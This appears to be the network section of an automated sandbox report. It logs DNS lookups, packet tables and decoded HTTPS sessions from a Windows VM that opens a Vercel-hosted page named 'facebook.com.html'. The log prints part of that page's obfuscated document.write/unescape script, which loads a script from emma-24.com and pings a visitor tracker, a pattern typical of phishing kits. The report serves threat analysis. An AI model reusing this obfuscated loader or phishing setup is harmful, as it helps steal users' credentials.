                          Jan 15, 2025 00:42:46.391689062 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:46.391721964 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:46.391813993 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:46.392417908 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:46.392433882 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:47.196563005 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:47.196645021 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:47.199963093 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:47.199982882 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:47.200208902 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:47.201771975 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:47.201816082 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:47.201828003 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:47.201946020 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:47.243328094 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:47.375973940 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:47.376154900 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:47.376300097 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:47.376353025 CET49845443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:47.376378059 CET4434984540.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:04.604389906 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:04.604437113 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:04.604497910 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:04.605099916 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:04.605119944 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.392829895 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.392923117 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:05.398138046 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:05.398153067 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.398420095 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.403618097 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:05.403666973 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:05.403672934 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.403985023 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:05.451338053 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.575303078 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.575500011 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.575599909 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:05.576375961 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:05.576396942 CET4434995740.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:05.576411963 CET49957443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:27.218238115 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:27.218302011 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:27.218377113 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:27.219027042 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:27.219047070 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.007560968 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.007673025 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:28.009548903 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:28.009565115 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.010373116 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.012082100 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:28.012146950 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:28.012156010 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.012289047 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:28.055370092 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.184072018 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.184300900 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.184386969 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:28.184595108 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:28.184621096 CET4435001040.115.3.253192.168.2.6
                          Jan 15, 2025 00:43:28.184636116 CET50010443192.168.2.640.115.3.253
                          Jan 15, 2025 00:43:29.688648939 CET50011443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:43:29.688751936 CET44350011216.58.206.36192.168.2.6
                          Jan 15, 2025 00:43:29.689021111 CET50011443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:43:29.689292908 CET50011443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:43:29.689332008 CET44350011216.58.206.36192.168.2.6
                          Jan 15, 2025 00:43:30.486685038 CET44350011216.58.206.36192.168.2.6
                          Jan 15, 2025 00:43:30.487229109 CET50011443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:43:30.487297058 CET44350011216.58.206.36192.168.2.6
                          Jan 15, 2025 00:43:30.487781048 CET44350011216.58.206.36192.168.2.6
                          Jan 15, 2025 00:43:30.488236904 CET50011443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:43:30.488373041 CET44350011216.58.206.36192.168.2.6
                          Jan 15, 2025 00:43:30.536674023 CET50011443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:43:40.447474003 CET44350011216.58.206.36192.168.2.6
                          Jan 15, 2025 00:43:40.447537899 CET44350011216.58.206.36192.168.2.6
                          Jan 15, 2025 00:43:40.447622061 CET50011443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:43:41.647608042 CET50011443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:43:41.647681952 CET44350011216.58.206.36192.168.2.6
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 15, 2025 00:42:25.320419073 CET53531031.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:25.329464912 CET53523661.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:26.344084024 CET53559771.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:29.630412102 CET5295153192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:29.630636930 CET5894853192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:29.638899088 CET53529511.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:29.638916016 CET53589481.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:30.840545893 CET5208953192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:30.840709925 CET5796253192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:30.851644993 CET53579621.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:30.858068943 CET53520891.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:31.714198112 CET6012353192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:31.714351892 CET5988653192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:31.715147972 CET5595753192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:31.715543032 CET5211653192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:31.724627018 CET53521161.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:31.725146055 CET53559571.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:31.963062048 CET53601231.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:32.048314095 CET53598861.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:32.966309071 CET5270953192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:32.966646910 CET6498453192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:33.101454020 CET53575431.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:33.153850079 CET53649841.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:33.296700954 CET53527091.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:33.592338085 CET6012853192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:33.592518091 CET6006053192.168.2.61.1.1.1
                          Jan 15, 2025 00:42:33.598987103 CET53600601.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:33.599246979 CET53601281.1.1.1192.168.2.6
                          Jan 15, 2025 00:42:43.374587059 CET53550181.1.1.1192.168.2.6
                          Jan 15, 2025 00:43:02.143089056 CET53641671.1.1.1192.168.2.6
                          Jan 15, 2025 00:43:24.826803923 CET53632151.1.1.1192.168.2.6
                          Jan 15, 2025 00:43:24.940105915 CET53523411.1.1.1192.168.2.6
                          TimestampSource IPDest IPChecksumCodeType
                          Jan 15, 2025 00:42:32.048433065 CET192.168.2.61.1.1.1c22b(Port unreachable)Destination Unreachable
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 15, 2025 00:42:29.630412102 CET192.168.2.61.1.1.10x4bb6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:29.630636930 CET192.168.2.61.1.1.10x1c62Standard query (0)www.google.com65IN (0x0001)false
                          Jan 15, 2025 00:42:30.840545893 CET192.168.2.61.1.1.10x64e4Standard query (0)mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appA (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:30.840709925 CET192.168.2.61.1.1.10x4699Standard query (0)mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app65IN (0x0001)false
                          Jan 15, 2025 00:42:31.714198112 CET192.168.2.61.1.1.10x3b8dStandard query (0)emma-24.comA (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:31.714351892 CET192.168.2.61.1.1.10x3937Standard query (0)emma-24.com65IN (0x0001)false
                          Jan 15, 2025 00:42:31.715147972 CET192.168.2.61.1.1.10x14cdStandard query (0)whos.amung.usA (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:31.715543032 CET192.168.2.61.1.1.10x964cStandard query (0)whos.amung.us65IN (0x0001)false
                          Jan 15, 2025 00:42:32.966309071 CET192.168.2.61.1.1.10xb6e0Standard query (0)emma-24.comA (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:32.966646910 CET192.168.2.61.1.1.10x2888Standard query (0)emma-24.com65IN (0x0001)false
                          Jan 15, 2025 00:42:33.592338085 CET192.168.2.61.1.1.10x8472Standard query (0)whos.amung.usA (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:33.592518091 CET192.168.2.61.1.1.10xc592Standard query (0)whos.amung.us65IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 15, 2025 00:42:29.638899088 CET1.1.1.1192.168.2.60x4bb6No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:29.638916016 CET1.1.1.1192.168.2.60x1c62No error (0)www.google.com65IN (0x0001)false
                          Jan 15, 2025 00:42:30.858068943 CET1.1.1.1192.168.2.60x64e4No error (0)mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app216.198.79.1A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:30.858068943 CET1.1.1.1192.168.2.60x64e4No error (0)mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app64.29.17.1A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:31.724627018 CET1.1.1.1192.168.2.60x964cNo error (0)whos.amung.us65IN (0x0001)false
                          Jan 15, 2025 00:42:31.725146055 CET1.1.1.1192.168.2.60x14cdNo error (0)whos.amung.us172.67.8.141A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:31.725146055 CET1.1.1.1192.168.2.60x14cdNo error (0)whos.amung.us104.22.74.171A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:31.725146055 CET1.1.1.1192.168.2.60x14cdNo error (0)whos.amung.us104.22.75.171A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:31.963062048 CET1.1.1.1192.168.2.60x3b8dNo error (0)emma-24.com172.93.105.3A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:33.296700954 CET1.1.1.1192.168.2.60xb6e0No error (0)emma-24.com172.93.105.3A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:33.598987103 CET1.1.1.1192.168.2.60xc592No error (0)whos.amung.us65IN (0x0001)false
                          Jan 15, 2025 00:42:33.599246979 CET1.1.1.1192.168.2.60x8472No error (0)whos.amung.us104.22.74.171A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:33.599246979 CET1.1.1.1192.168.2.60x8472No error (0)whos.amung.us172.67.8.141A (IP address)IN (0x0001)false
                          Jan 15, 2025 00:42:33.599246979 CET1.1.1.1192.168.2.60x8472No error (0)whos.amung.us104.22.75.171A (IP address)IN (0x0001)false
                          • mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
                          • https:
                            • whos.amung.us
                            • emma-24.com
                          Session IDSource IPSource PortDestination IPDestination Port
                          0192.168.2.64971640.115.3.253443
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:27 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 59 50 6e 65 4d 4b 76 4e 58 45 6d 65 4a 42 43 72 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 63 62 31 36 34 66 61 39 66 32 32 35 37 64 0d 0a 0d 0a
                          Data Ascii: CNT 1 CON 305MS-CV: YPneMKvNXEmeJBCr.1Context: 5ccb164fa9f2257d
                          2025-01-14 23:42:27 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                          2025-01-14 23:42:27 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 59 50 6e 65 4d 4b 76 4e 58 45 6d 65 4a 42 43 72 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 63 62 31 36 34 66 61 39 66 32 32 35 37 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4f 70 37 59 56 35 33 6a 38 51 34 58 4b 45 37 69 76 69 58 79 69 62 51 7a 51 42 4d 73 4d 4b 50 76 51 34 35 50 30 37 30 77 72 57 47 73 51 6e 43 52 38 31 78 6e 4b 74 69 75 44 53 68 66 55 32 36 30 5a 31 64 76 62 57 57 74 77 4a 30 58 6c 62 59 51 51 4c 79 72 39 6d 41 34 41 34 44 51 78 51 42 2b 74 64 76 67 53 6a 68 4f 73 4d 74 70
                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: YPneMKvNXEmeJBCr.2Context: 5ccb164fa9f2257d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWOp7YV53j8Q4XKE7iviXyibQzQBMsMKPvQ45P070wrWGsQnCR81xnKtiuDShfU260Z1dvbWWtwJ0XlbYQQLyr9mA4A4DQxQB+tdvgSjhOsMtp
                          2025-01-14 23:42:27 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 59 50 6e 65 4d 4b 76 4e 58 45 6d 65 4a 42 43 72 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 63 62 31 36 34 66 61 39 66 32 32 35 37 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: YPneMKvNXEmeJBCr.3Context: 5ccb164fa9f2257d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                          2025-01-14 23:42:27 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                          Data Ascii: 202 1 CON 58
                          2025-01-14 23:42:27 UTC58INData Raw: 4d 53 2d 43 56 3a 20 32 41 67 72 6e 55 64 64 32 45 65 7a 2f 37 72 30 4e 6b 38 47 5a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                          Data Ascii: MS-CV: 2AgrnUdd2Eez/7r0Nk8GZg.0Payload parsing failed.


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.649723216.198.79.14435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:31 UTC701OUTGET /facebook.com.html HTTP/1.1
                          Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:31 UTC565INHTTP/1.1 200 OK
                          Accept-Ranges: bytes
                          Access-Control-Allow-Origin: *
                          Age: 283691
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Disposition: inline; filename="facebook.com.html"
                          Content-Length: 2534
                          Content-Type: text/html; charset=utf-8
                          Date: Tue, 14 Jan 2025 23:42:31 GMT
                          Etag: "62423f84e27a79fd0b7590cfb2e55c91"
                          Last-Modified: Sat, 11 Jan 2025 16:54:20 GMT
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                          X-Vercel-Cache: HIT
                          X-Vercel-Id: iad1::gzkvr-1736898151421-7e46e26f4756
                          Connection: close
                          2025-01-14 23:42:31 UTC2372INData Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 30 41 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 33 43 2f 6d 65 74 61 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 33 45 25 33 43 2f 6d 65 74 61 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 74 69 74 6c 65 25 33 45 72 65 70 6c 69 74 25 33 43 2f 74 69 74 6c 65 25 33 45
                          Data Ascii: <script>...document.write(unescape("%0A%3Chtml%3E%0A%0A%3Chead%3E%0A%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%3C/meta%3E%0A%20%20%3Cmeta%20content%3D%22width%3Ddevice-width%22%20name%3D%22viewport%22%3E%3C/meta%3E%0A%20%20%3Ctitle%3Ereplit%3C/title%3E
                          2025-01-14 23:42:31 UTC162INData Raw: 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 65 6c 73 65 25 30 41 25 37 42 25 30 41 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 25 32 30 25 33 44 25 32 30 25 32 32 68 74 74 70 73 25 33 41 2f 2f 77 77 77 2e 6a 75 73 74 69 63 65 2e 67 6f 76 2f 61 72 63 68 69 76 65 2f 6e 64 69 63 2f 73 70 61 6e 69 73 68 2f 31 33 34 32 30 2f 69 6e 64 65 78 2e 68 74 6d 25 32 32 25 33 43 2f 73 63 72 69 70 74 25 33 45 22 29 29 3b 0d 0a 2f 2f 2d 2d 3e 0d 0a 3c 2f 73 63 72 69 70 74 3e
                          Data Ascii: 0%20%20%20%20%20%20%7Delse%0A%7B%0Awindow.location%20%3D%20%22https%3A//www.justice.gov/archive/ndic/spanish/13420/index.htm%22%3C/script%3E"));//--></script>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.649722216.198.79.14435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:31 UTC607OUTGET /style.css HTTP/1.1
                          Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:31 UTC363INHTTP/1.1 404 Not Found
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Length: 39
                          Content-Type: text/plain; charset=utf-8
                          Date: Tue, 14 Jan 2025 23:42:31 GMT
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                          X-Vercel-Error: NOT_FOUND
                          X-Vercel-Id: iad1::f742j-1736898151768-df29e8a43a54
                          Connection: close
                          2025-01-14 23:42:31 UTC39INData Raw: 54 68 65 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 0a 0a 4e 4f 54 5f 46 4f 55 4e 44 0a
                          Data Ascii: The page could not be foundNOT_FOUND


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.649729172.67.8.1414435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:32 UTC678OUTGET /pingjs/?k=condiossi729&t=LA%20CENTRAL%20%F0%9F%91%BB&x=https://www.facebook.com/ HTTP/1.1
                          Host: whos.amung.us
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:32 UTC254INHTTP/1.1 200 OK
                          Date: Tue, 14 Jan 2025 23:42:32 GMT
                          Content-Type: text/javascript;charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 90217babbd8342c0-EWR
                          alt-svc: h3=":443"; ma=86400
                          2025-01-14 23:42:32 UTC36INData Raw: 31 65 0d 0a 57 41 55 5f 72 5f 28 27 38 27 2c 27 63 6f 6e 64 69 6f 73 73 69 37 32 39 27 2c 2d 31 29 3b 0d 0a
                          Data Ascii: 1eWAU_r_('8','condiossi729',-1);
                          2025-01-14 23:42:32 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.649736172.93.105.34435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:32 UTC564OUTGET /index.php?username=panilover HTTP/1.1
                          Host: emma-24.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:32 UTC474INHTTP/1.1 200 OK
                          Connection: close
                          access-control-allow-origin: *
                          cache-control: no-store, no-cache, must-revalidate, max-age=0
                          cache-control: post-check=0, pre-check=0
                          pragma: no-cache
                          content-type: application/javascript
                          transfer-encoding: chunked
                          date: Tue, 14 Jan 2025 23:42:32 GMT
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
